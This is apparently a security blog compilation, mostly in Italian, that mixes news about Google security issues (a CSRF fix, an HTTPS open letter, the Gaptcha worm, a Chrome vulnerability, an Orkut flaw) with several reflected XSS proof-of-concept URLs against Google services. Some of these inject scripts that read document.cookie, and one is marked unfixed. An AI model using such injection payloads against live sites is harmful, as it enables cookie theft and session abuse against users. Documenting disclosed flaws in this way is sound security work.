Google ha finalmente aumentato la sicurezza dei propri servizi introducendo un sistema di protezioni dagli attacchi di tipo Csrf (Cross-site Request Forgery).

In un attacco Csrf, le credenziali dell’utente “fidato” di un servizio vengono usate da una terza persona per i propri scopi: per esempio, mentre è aperta nel browser una sessione di Gmail il proprietario di un sito malevolo che stiamo visitando potrebbe usare le nostre credenziali per farsi consegnare la lista dei contatti, o per inviare email al nostro posto.

Gmail non è l’unico servizio di Google che finora presentava questa vulnerabilità; anche YouTube, per esempio, ne era affetto.

Il rimedio adottato da Google consiste nella generazione di un token univoco (conservato in un cookie) all’apertura della sessione: per ogni richiesta sarà necessario che il sistema fornisca questo token (che in fondo è una stringa di testo che funge da sistema di validazione dell’identità dell’utente). Se una richiesta ne è sprovvista, essa viene negata.

Ci sono voluti tre anni, da quando la vulnerabilità è stata segnalata, prima che Google mettesse mano al problema.

From: http://www.zeusnews.it

XSS:

http://www.googlelabs.com/?q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&apps=Search+Labs

http://www.googlelabs.com/?q=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&apps=Search+Labs

STATUS: 30 june 1:18 amFIXED

XSS:

http://www.google.com/codesearch/p?hl=en%22;//%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%22%3E%3Cscript%3Ealert(navigator.userAgent)%3C/script%3E&sa=N&cd=2&ct=By_XaDoS

STATUS: 21 june 5:40 p.m.FIXED

Other XSS by xados:

http://xssed.com/archive/author=xados/
http://www.googlebig.com/forum/search.php?action=results&sid=6f4a70bca1c0f2bee310e3e1745a9d94

Gmail e i servizi cloud offerti da Google devono offrire una maggiore protezione dei dati degli utenti. Non hanno dubbi in proposito i firmatari di una lettera aperta da poco indirizza al CEO di Mountain View, Eric Schmidt. Gli autori della missiva sono ricercatori e docenti universitari preoccupati dalla possibilità che i servizi online offerti da Google possano portare al furto di dati e a non pochi rischi legati alla privacy. Una tesi sostanzialmente respinta dal motore di ricerca.

«Le impostazioni predefinite di Google mettono inutilmente a rischio i consumatori. I servizi di Google proteggono username e password degli utenti da occhi indiscreti e da possibili furti. Tuttavia, quando un utente compone email, documenti, fogli di calcolo, presentazioni e appuntamenti sui calendari, questi dati potenzialmente sensibili vengono trasferiti sui server di Google in chiaro, consentendo a chiunque con gli opportuni strumenti di rubare tali informazioni» scrivono i 36 esperti nella lettera aperta [pdf] indirizza al primo responsable di Mountain View, sottolineando quella che appare come una grave carenza di sicurezza ai loro occhi.

Sotto accusa è principalmente l’utilizzo dello standard di sicurezza HTTPS per un numero limitato di operazioni effettuate attraverso i servizi cloud offerti dal colosso delle ricerche online: «Google utilizza lo standard Hypertext Transfer Protocol Secure (HTTPS) come tecnologia per criptare i dati e proteggere le informazioni inserite dagli utenti per effettuare i login. Tuttavia, il sistema di criptazione non è abilitato come impostazione predefinita per proteggere altre informazioni trasmesse dagli utenti attraverso Google Mail, Docs e Calendar. Così, chiunque utilizzi i servizi di Google da una connessione pubblica (come un network aperto wireless in una caffetteria, in biblioteca o a scuola) rischia di subire il furto dei dati sensibili, anche da utenti malintenzionati poco preparati. Gli strumenti per rubare le informazioni sono ampiamente disponibili su Internet».

Gli autori della lettera sottolineano come buona parte dei servizi cloud offerti da Google possano essere manualmente configurati per utilizzare sempre lo standard HTTPS, sottraendo i propri dati dagli sguardi indiscreti in Rete. Tale operazione richiede però un certo grado di consapevolezza da parte degli abbonati ai servizi di Mountain View e sufficienti conoscenze tecniche, particolare che dovrebbe indurre Google a rendere predefinite le impostazioni legate a HTTPS. Secondo i ricercatori e gli accademici, utilizzare lo standard sicuro come impostazione predefinita causerebbe un minimo calo delle prestazioni dei servizi cloud, ma consentirebbe agli utenti di proteggere con maggiore efficacia i dati caricati sui loro account.

From: http://www.webnews.it

URL:

https://www.google.com/support/bin/answer.py?%22%3E%3C/script%3E%3Cscript%3Ealert(%22BlackHacker[dot]Coder[at]Gmail[dot]com%22)%3C/script%3E=00000&hl=tr

> Mirror <

The other two new XSS of Google:

- knol.google.com | Author: Azat Harutyunyan | > Mirror <

URL:

http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&qexact=&qor1=%3E%3Cscript%3Ealert(/xss%20by%20azat/)%3C/script%3E&qor2=%3E%3Cscript%3Ealert(/xss%20by%20azat/)%3C/script%3E&qor3=&qneg=&doctype=0&loc0=on&loc1=on&loc3=on&loc4=on&loc5=on&loc7=on&restrict=3&url=%3E%3Cscript%3Ealert(/xss/)%3C/script3E&editdate=0&createdate=0&language=0&license=0&collab=0&link=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&templateUrl=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&promo=&sort=0&num=10

- books.google.com | Author: HacKSever | > Mirror <

URL:

http://books.google.com/books?q=%22%3B%3E%3C%2Fnoscript%3E%3Cscript%3Ealert(%27test%27)%3B%3C%2Fscript%3E&btnG=Kitaplar%C4%B1+Ara&hl=tr

La società di sicurezza Bkis Honeypot ha scoperto nei giorni scorsi un nuovo particolare worm che riesce a mettere in crisi il CAPTCHA di Gmail. Il sistema di sicurezza, che garantisce un’iscrizione sicura effettuata da una persona in carne e ossa, in realtà viene aggirato in modo molto semplice dal malware all’atto della registrazione di un nuovo account.

Il malware è stato chiamato W32.Gaptcha.Worm dai laboratori che l’hanno scoperto e ha la capacità di “distruggere” letteralmente un account di posta elettronica aperto con il servizio di Google. Il worm è stato classificato con un livello medio di pericolosità, a causa della sua abilità e velocità di azione.

Una volta insediatosi nel sistema operativo, Gaptcha apre automaticamente una finestra di Internet Explorer, collegandosi alla pagina di Gmail che permette di registrare un nuovo account. L’utente assisterà da spettatore alle azioni del worm, ignaro di ciò che sta accadendo sul suo PC.

Innanzitutto se non fosse attiva una connessione ad Internet sul computer infetto, il worm crea un file.bat per eliminarsi da solo. Se invece ha la possibilità di agire, si connette ad un suo server per scoprire le caratteristiche della connessione attiva sul PC.

Nel campo relativo al nome e al cognome inserirà dei dati generati in modo casuale. Tra i nomi potrà inserire valori come Emily, Isabella, Desirae, Maryam, Kenia; nel campo del cognome potrà scrivere dati come Smith, Johnson.

A questo punto arriva il momento di bypassare il filtro CAPTCHA. Il worm scarica nella cartella dei file temporanei l’immagine dei caratteri da riconoscere, la invia ad un suo sito e successivamente l’immagine, una volta riconosciuta, viene rispedita indietro e quindi decodificata.

Il worm può concludere con successo la registrazione. Poi si collegherà all’account creato e cambierà le impostazioni necessarie per l’invio della posta elettronica. In seguito invierà le informazioni dell’account ai cybercriminali che controllano l’attività del malware.

Quando Google si accorgerà che qualcosa non va in quell’account provvederà a disabilitare la registrazione, ad impedire che l’utente possa accedere agli account Gmail esistenti o crearne di nuovi da quell’indirizzo IP, che verrà bloccato nelle liste di Google.

Quando il worm ha concluso la sua “opera di distruzione”, crea comunque un file che gli consentirà di auto-eliminarsi e far scomparire le sue tracce. Come sempre, il consiglio è quello di aggiornare l’antivirus con le ultime definizioni rilasciate dalle case produttrici e prestare molta attenzione.

From: http://www.oneitsecurity.it

Google Chrome 1.0.154.59 corregge la vulnerabilità CVE-2009-1340, “ChromeHTML protocol handler same-origin bypass”. Un errore nella gestione degli URL con un protocollo “chromehtml:” poteva in certe condizioni permettere ad un attacker di eseguire script a sua scelta sua qualsiasi pagina o accedere ad una lista di file sul disco locale. Se un utente ha installato Google Chrome, visitando in Internet Explorer una pagina web controllata dall’attacker è possibile l’esecuzione di Google Chrome, con apertura di schede multiple, e caricamento di script che si eseguono dopo la navigazione su una URL scelta dall’attacker. Questo tipo di attacco funziona solo se Chrome non è già in esecuzione. Maggiori dettagli sulla problematica di sicurezza sono disponibili sul sito Google Code di Chromium (Issue 9860).

Google Chrome “Dev” 2.0.174.0 – Google Chrome Beta 2.0.172.5 – Altre

La falla affligge Google Chrome 1.0.154.55 e precedenti. Google classifica il problema di gravità “Alta”, in quanto permette, in certe condizioni, universal cross-site scripting (UXSS) senza interazione da parte dell’utente.

Google Chrome 2.0.172.8 “Beta” corregge invece due problematiche principali nel browser: [Issue 9904] Su alcuni siti il testo scompare o non viene mai renderizzato. Per esempio, su Google Calendar i tioli di tutti gli eventi giornalieri non vengono mostrati; [Issue 10656] Google Chrome Beta non viene eseguito dopo l’aggiornamento alla versione 172.6. Questo ha interessato coloro che hanno installato Google Chrome tramite Google Pack, si sono iscritti al canale Beta, e non agiscono come amministratori del sistema. L’aggiornamento Beta non include ulteriori modifiche.

Google ha inoltre da poche ore reso disponibile la nuova versione 2.0.176.0 di Google Chrome sul canale “Developer”. Parleremo di questa release una news dedicata.

Riportiamo la descrizione dei tre canali di release di Google Chrome: Stable channel. Tutti utilizzano il canale Stabile alla prima installazione di Google Chrome. Il canale Stabile viene aggiornato con funzionalità e correzioni una volta che queste vengono testate adeguatamente nel canale Beta. Beta channel. Dedicato a coloro che desiderano utilizzare e aiutare a sistemare le ultime funzionalità. Ogni mese circa, Google promuove funzionalità stabili e complete dal canale Dev al canale Beta. È un canale più stabile di quello Dev, ma manca ugualmente dell’ordine che ci si aspetta da un prodotto finito. Developer preview channel. Il canale Dev consente alle idee di essere testate (ed a volte scartate). Può rivelarsi molto instabile, e le nuove funzionalità spesso richiedono configurazioni manuali per essere abilitate. Consente tuttavia in modo semplice di aiutare gli sviluppatori nel miglioramento del prodotto.

Ricordiamo che tutti gli utenti possono scegliere il canale a cui registrarsi (Stable, Beta e Developer preview) sfruttando la versione aggiornata del software Chrome Channel Chooser.

From: http://www.tweakness.net/news/5059

Security researcher Pierre Gardenat reported a new interesting vulnerability in Google’s service Orkut. Malicious users can spread XSS worms on Orkut or steal authentication credentials from Google users who also use Orkut.

According to Pierre, it is important to note that thanks to the fact that this flaw affects an externally integrated application in Orkut, sensitive cookies cannot be read. An attacker will still have increased possibilities for a successful attack, just because he can force the connected user to go where he wants, using the existing open session(s).

Google also uses HTTPOnly option. Once again, this prevents an attacker from getting sensitive information, but still allows to launch powerful attacks. HTTPOnly – implemented from Firefox 3.0.6 and partially from Internet Explorer 7 : cf. http://www.owasp.org/index.php/HTTPOnly – only helps mitigate session stealing.

Anyway, this particular flaw does not affect Google directly, but a trusted application. Above all, this vulnerability clearly shows how risky it can be for a large social network like Orkut when relying on external applications.

You can see a compromised Orkut profile on:

http://www.orkut.com/Main#Application.aspx?uid=2377494914036893288&appId=675426251494

(you need to be connected to orkut to be able to see this profile).

Screenshot:

Thanks Pierre for the report! :-) We hope that Orkut’s staff will look into this and fix it quickly…

URL: http://groups.google.com/groups/dir?sel=usenet%3D%3C/noscript%3E%3Cscript%3Ealert(%27HacKSever%27)%3C/script%3E

Author: HacKSever

Status: UNFIXED

Mirror: http://www.xssed.com/mirror/59598/

La Mazzon ha confermato come la problematica abbia interessato un numero molto ristretto numero di utenti (lo 0,05% dei documenti complessivamente gestiti attraverso Google Docs). L’incidente è stato tempestivamente risolto dai tecnici di Google impiegando una procedura automatizzata informando dell’accaduto gli utenti affetti dal problema.

Nel mese di gennaio scorso, Google ha dichiarato di aver siglato diversi accordi con alcuni rivenditori IT con l’obiettivo di commercializzare l’accesso ai servizi online della società fondata da Larry Page e Sergey Brin agli utenti di tipo aziendale. A partire dalla fine di questo mese, infatti, i vari reseller di Google potranno personalizzare e supportare direttamente le versioni “Premium”, a pagamento, di Google Apps.

From: http://www.ilsoftware.it/articoli.asp?ID=5071